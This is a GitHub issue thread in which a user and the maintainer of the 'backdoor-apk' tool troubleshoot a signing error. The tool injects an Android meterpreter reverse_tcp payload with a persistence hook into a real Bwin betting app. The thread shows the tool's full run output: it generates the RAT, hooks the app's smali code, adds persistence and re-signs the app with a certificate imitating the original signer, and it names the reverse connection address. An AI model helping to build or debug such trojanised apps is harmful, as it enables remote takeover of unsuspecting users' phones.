dana-at-cp
commented
8 years ago Is the original APK file signed? The script looks for "*.RSA" in the original archive and attempts to extract the dname value from the original cert.
Closed Tirititelu closed 8 years ago
dana-at-cp
commented
8 years ago Is the original APK file signed? The script looks for "*.RSA" in the original archive and attempts to extract the dname value from the original cert.
Tirititelu
commented
8 years ago Yes, i try with several APKs but the same error appear.... "jarsigner error: java.lang.RuntimeException: certificate exception: Empty issuer DN not allowed in X509Certificates". I have try with this apk: http://www.bet.es/wp-content/uploads/image/Bwin/Bwin-app-android.apk for example.
signing.keystore attached.
dana-at-cp
commented
8 years ago Did you modify the script in any way? I checked the APK and confirmed that there is a certificate in the archive.
root@kali:/tmp# unzip -l Bwin-app-android.apk |grep ".RSA" 942 2015-11-02 14:44 META-INF/CERT.RSA root@kali:/tmp# unzip -p Bwin-app-android.apk META-INF/CERT.RSA |keytool -printcert Owner: CN=Benjamin Ferrari, OU=NDC, O=bwin, L=Gibraltar, ST=Gibraltar, C=Gl Issuer: CN=Benjamin Ferrari, OU=NDC, O=bwin, L=Gibraltar, ST=Gibraltar, C=Gl Serial number: 4d5117a9 Valid from: Tue Feb 08 05:15:05 EST 2011 until: Mon Jun 11 06:15:05 EDT 3010 Certificate fingerprints: MD5: E5:A4:43:75:FD:92:90:BB:6D:18:D4:09:D5:63:1D:5D SHA1: 8A:38:EE:1D:92:81:A0:63:1C:A6:BF:EE:1C:04:A2:10:BB:D5:62:96 SHA256: 34:CB:DE:AC:23:85:6A:B6:3E:BD:D2:60:89:A1:2E:72:A6:56:14:78:A0:5B:17:23:16:E3:C5:BF:BA:B0:2B:C4 Signature algorithm name: SHA1withRSA Version: 3 root@kali:/tmp#
The script should process this APK fine.
Tirititelu
commented
8 years ago I only changed IP and PORT to reverse_tcp connection, but i tried with no changes with the same result... :-(
dana-at-cp
commented
8 years ago Try the latest version of the script off of the master branch. If it still fails then attach the full output of run.log and I'll have another look.
dana-at-cp
commented
8 years ago I ran the latest version of the script on the APK you shared. It was processed fine. Check your environment. Make sure the APK is in the same working directory as the script at runtime.
root@kali:~/Scripts/github/backdoor-apk/backdoor-apk# ./backdoor-apk.sh Bwin-app-android.apk
[*] Generating RAT APK file...done.
[+] Using payload: android/meterpreter/reverse_tcp
[+] Handle the reverse connection at: 10.6.9.31:1337
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[*] Verifying signed artifacts...done.
[*] Aligning recompiled APK...done.
root@kali:~/Scripts/github/backdoor-apk/backdoor-apk# sha256sum Bwin-app-android.apk
8f771e547b770fa4ed85b4df647e03e8ad814a9b04cf7d23fbd47e9557618f47 Bwin-app-android.apk
root@kali:~/Scripts/github/backdoor-apk/backdoor-apk#I tried again and the same happend:
root@kaliSanna:~/backdoor-apk-master/backdoor-apk# ./backdoor-apk.sh Bwin-app-android.apk [_] Generating RAT APK file...done. [+] Using payload: android/meterpreter/reversetcp [+] Handle the reverse connection at: 10.6.9.31:1337 [] Decompiling RAT APK file...done. [] Decompiling original APK file...done. [] Merging permissions of original and payload projects...done. [] Running proguard on RAT APK file...done. [] Decompiling obfuscated RAT APK file...done. [] Creating new directories in original project for RAT smali files...done. [] Copying RAT smali files to new directories in original project...done. [] Fixing RAT smali files...done. [] Locating smali file to hook in original project...done. [] Adding hook in original smali file...done. [] Adding persistence hook in original project...done. [] Recompiling original project with backdoor...done. [] Generating RSA key for signing...done. [*] Signing recompiled APK...done. [!] Failed to sign recompiled APK
I am in a Kali Linux Sanna, but i try in a clean Kali Linux Sanna with the same result. I try in a Kali Linux 2016 but it doesnt work, in this case in:
[!] Failed to sign recompiled APK
I attach both logs.
Thanks!
Tirititelu
commented
8 years ago No idea?.
Thx!
Hi,
i try again with your new version but dont gain the backdoor-apk.
[] Generating reverse tcp meterpreter payload...done. [+] Handle the meterpreter connection at: XX.XXX:XXX.XXX:4444 [] Decompiling RAT APK file...done. [] Decompiling original APK file...done. [] Merging permissions of original and payload projects...done. [] Running proguard on RAT APK file...done. [] Decompiling obfuscated RAT APK file...done. [] Creating new directories in original project for RAT smali files...done. [] Copying RAT smali files to new directories in original project...done. [] Fixing RAT smali files...done. [] Locating smali file to hook in original project...done. [] Adding hook in original smali file...done. [] Recompiling original project with backdoor...done. [] Generating RSA key for signing...done. [] Signing recompiled APK...done. [!] Failed to sign recompiled APK
run.log:
I: Copying unknown files/dir... dname value: Generando par de claves RSA de 2.048 bits para certificado autofirmado (SHA256withRSA) con una validez de 10.000 días para: [Almacenando /root/Descargas/backdoor-apk-master/backdoor-apk/signing.keystore] jarsigner error: java.lang.RuntimeException: certificate exception: Empty issuer DN not allowed in X509Certificates Forcing cleanup due to a failure or error state!
Can you help me?.
Thanks